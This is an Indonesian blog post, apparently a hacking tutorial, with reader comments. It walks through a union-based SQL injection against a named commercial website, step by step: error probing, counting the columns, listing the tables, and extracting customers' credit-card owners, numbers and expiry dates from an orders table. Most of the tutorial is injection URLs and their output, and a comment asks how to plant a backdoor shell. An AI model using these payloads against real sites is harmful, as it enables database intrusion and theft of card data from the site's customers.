Hacking with SQL injection

Posted in Hacking, Security 2 years 3 months ago by bento

Setelah sekian lama ga pernah nulis di blog..akhirnya ada temen yg minta dibikinin tutorial tentang sql Injection… :devil_tb: ,Cuma butuh sedikit logika + kreatifitas..Tapi ga pa², berhubung temen seperjuangan menuntut ilmu di negeri nyamuk…sapa tau ntar kalo dah gw bikinin dia mau bantu kesulitan yang saia alami…H!H!H!H!H!

Huyee…siapkan sebungkus starmild + kopi susu :smoke_tb: :drunk_tb:
langsung sajoo, misal pada site http://www.scootsusa.com/, kita cari link yang ada bugnya…
kita dapet :
http://www.scootsusa.com/customer_testimonials.php?testimonial_id=3
Tinggal tambahin tanda petik satu (’) sajoo untuk test Vulnerbilitiesnya :laugh_tb:

alhasil muncul keterangan error seperti berikut :
1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1 select * FROM customer_testimonials WHERE testimonials_id = 3\'

Sekarang kita kasi perintah order by…buat nyari ada berapa kolom di sana…
http://www.scootsusa.com/customer_testimonials.php?testimonial_id=3 order by 20--
artinya kita coba cek langsung di binary 20, sekarang kita kurangin sampe muncul yang true…

ok..kita dapet yang true di binary 8
http://www.scootsusa.com/customer_testimonials.php?testimonial_id=3 order by 8--
sedangkan yang ke 9 uda false, jadi kita dapet binarynya di angka 8.

Selanjutnya kita bajak pake union select.
http://www.scootsusa.com/customer_testimonials.php?testimonial_id=3 union all select 1,2,3,4,5,6,7,8--
hasilnya :
Testimonial by 4 3 6

Langsung saja misal kita ambil angka 3 atau 6 juga bisa. :thumbup_tb:
kita cek versi sqlnya doeloe…
http://www.scootsusa.com/customer_testimonials.php?testimonial_id=3 union all select 1,2,version(),4,5,6,7,8--
hasilnya :
Testimonial by 4 5.0.67.d7-ourdelta-log 6
ternyata sqlnya versi 5… lanjut bajak si kacrut…

kemudian cari table dan coloumnya…
http://www.scootsusa.com/customer_testimonials.php?testimonial_id=3 union all select 1,2,table_name,4,5,6,7,8 from information_schema.tables where table_schema=database()--

nah lhoo kluar semua tuh nama tablenya…xixiixixixixi :jittery_tb:
Berhubung sekarang kita mau cari data CC , kita ambil table yg nyimpen data² CC
Biasanya CC ada di table orders.
Karna kita dah nemu table orders,kita coba pake table orders. Table lainnya silahkan oprek sndiri yah… :thumbup_tb:

sekarang kita cari coloumnya… :guns_tb:
sebelumnya kita konvert dolo table orders jadi hexa, jadinya 6F7264657273
sebelumnya kita tambahin karakter 0x pada hasil convert tadi kemudian masukkan ke urlnya…
http://www.scootsusa.com/customer_testimonials.php?testimonial_id=3 union all select 1,2,column_name,4,5,6,7,8 from information_schema.columns where table_name=0x6F7264657273--

Alhasil keluar tuh coloum²nya…hohoho
payment_method,cc_type,cc_owner,cc_number,cc_expires, dll

ok skarang kita masukkan data² tadi dan haslinya… :shock_tb:
http://www.scootsusa.com/customer_testimonials.php?testimonial_id=3 union select 1,2,concat_ws(0x3a,payment_method,cc_type,cc_owner,cc_number,cc_expires),4,5,6,7,8 from orders--

dan…eng..ing..eng…xixixixiixixixi :clap_tb:

semoga aja itu bisa sedikit membantu temen² yg pengen belajar SQL injection..Ini semua hanya sebagai pengetahuan sajooo…saia tidak ikod bertanggung jawab jika di salah pergunakan… :flush_tb:

salam hangat…
banksonk

Tags:

2 Comments

by faridlaros

muanteb tenaaaaaaaaaaan

posted 2 years ago

Mbalesi

by tawur

bos, arep takon… totur nnag nduwur kan kanggo ndelok isine database. terus carane ben iso ngrubah database piye??? carane ndeleh backdoor (shell) piye???

mugo2 tutor sql injection part 2 segera terbit dan menjawab semua pertanyaanku…

maturnuwun… cepetan…

Hacking with SQL injection

Hacking with SQL injection

Recent Comments

Contact

Visitors

Tag`s

Chat..?!

-=[Link]=-

-=[pren]=-